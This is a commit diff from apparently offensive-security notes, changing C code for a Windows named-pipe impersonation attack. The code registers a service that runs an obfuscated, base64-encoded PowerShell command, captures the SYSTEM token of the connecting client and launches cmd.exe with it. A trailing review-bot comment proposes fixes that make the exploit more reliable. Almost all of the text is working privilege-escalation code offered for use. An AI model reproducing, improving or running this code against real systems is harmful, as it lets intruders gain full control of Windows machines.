GitBook: [master] one page modified
This commit is contained in:
parent
bcb25897ff
commit
65a0afb2a4
@ -29,16 +29,16 @@ int ServiceGo(void) {
|
||||
}
|
||||
|
||||
// create Piper service
|
||||
scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
|
||||
SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,
|
||||
"C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==",
|
||||
NULL, NULL, NULL, NULL, NULL);
|
||||
scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
|
||||
SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,
|
||||
"C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==",
|
||||
NULL, NULL, NULL, NULL, NULL);
|
||||
|
||||
if (scService == NULL) {
|
||||
//printf("[!] CreateServiceA() failed: [%d]\n", GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
|
||||
// launch it
|
||||
StartService(scService, 0, NULL);
|
||||
|
||||
@ -47,12 +47,12 @@ int ServiceGo(void) {
|
||||
DeleteService(scService);
|
||||
|
||||
CloseServiceHandle(scService);
|
||||
CloseServiceHandle(scManager);
|
||||
CloseServiceHandle(scManager);
|
||||
}
|
||||
|
||||
int main() {
|
||||
|
||||
LPCWSTR sPipeName = "\\\\.\\pipe\\piper";
|
||||
LPCSTR sPipeName = "\\\\.\\pipe\\piper";
|
||||
HANDLE hSrvPipe;
|
||||
HANDLE th;
|
||||
BOOL bPipeConn;
|
||||
@ -65,34 +65,34 @@ int main() {
|
||||
PROCESS_INFORMATION pi;
|
||||
|
||||
// open pipe
|
||||
hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT,
|
||||
PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);
|
||||
|
||||
hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT,
|
||||
PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);
|
||||
|
||||
// create and run service
|
||||
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) ServiceGo, NULL, 0, 0);
|
||||
|
||||
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0);
|
||||
|
||||
// wait for the connection from the service
|
||||
bPipeConn = ConnectNamedPipe(hSrvPipe, NULL);
|
||||
if (bPipeConn) {
|
||||
ReadFile(hSrvPipe, &pPipeBuf, MESSAGE_SIZE, &dBRead, NULL);
|
||||
|
||||
|
||||
// impersonate the service (SYSTEM)
|
||||
if (ImpersonateNamedPipeClient(hSrvPipe) == 0) {
|
||||
return -1;
|
||||
}
|
||||
|
||||
|
||||
// wait for the service to cleanup
|
||||
WaitForSingleObject(th, INFINITE);
|
||||
|
||||
|
||||
// get a handle to impersonated token
|
||||
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) {
|
||||
return -2;
|
||||
}
|
||||
return -2;
|
||||
}
|
||||
|
||||
// create new primary token for new process
|
||||
if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation,
|
||||
TokenPrimary, &hNewToken)) {
|
||||
return -4;
|
||||
TokenPrimary, &hNewToken)) {
|
||||
return -4;
|
||||
}
|
||||
|
||||
//Sleep(20000);
|
||||
@ -100,14 +100,14 @@ int main() {
|
||||
ZeroMemory(&si, sizeof(si));
|
||||
si.cb = sizeof(si);
|
||||
ZeroMemory(&pi, sizeof(pi));
|
||||
if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, NULL, L"cmd.exe",
|
||||
NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) {
|
||||
if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL,
|
||||
NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) {
|
||||
return -5;
|
||||
}
|
||||
|
||||
|
||||
// revert back to original security context
|
||||
RevertToSelf();
|
||||
|
||||
|
||||
}
|
||||
|
||||
return 0;
|
||||
|
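Review bot: Every early return in main (`return -1` after ImpersonateNamedPipeClient, `-2` after OpenThreadToken, `-4` after DuplicateTokenEx, `-5` after CreateProcessWithTokenW) leaves hSrvPipe, th and whichever of hImpToken/hNewToken was already obtained open, and the success path never closes them or pi.hProcess/pi.hThread either; the impersonation begun by ImpersonateNamedPipeClient is likewise only undone on the success path, so a failed OpenThreadToken or DuplicateTokenEx returns from main with the thread still impersonating. A single cleanup label reached by every exit that calls RevertToSelf() and then CloseHandle() on each non-NULL handle would fix both, and the ReadFile result and dBRead on the line after ConnectNamedPipe should be checked rather than discarded so a failed or short read is not treated as a received message. Separately, `(LPTHREAD_START_ROUTINE)ServiceGo` in the CreateThread call converts an `int (*)(void)` into a `DWORD (WINAPI *)(LPVOID)`, and calling through an incompatible function-pointer type is undefined behaviour in C even where the ABI happens to tolerate it; a thin adapter avoids the cast: `static DWORD WINAPI ServiceGoThread(LPVOID unused) { (void)unused; return (DWORD)ServiceGo(); }` passed as the start routine. main's declarations (pPipeBuf, dBRead, hImpToken, hNewToken, si) and the ServiceGo definition lie outside the shown hunks, so whether `&pPipeBuf` in ReadFile is the address of an array (harmless) or of a pointer (a bug) cannot be confirmed from here, and the apparent duplicate `CloseServiceHandle(scManager)` in the second hunk may be the page printing one changed line twice rather than a real double close.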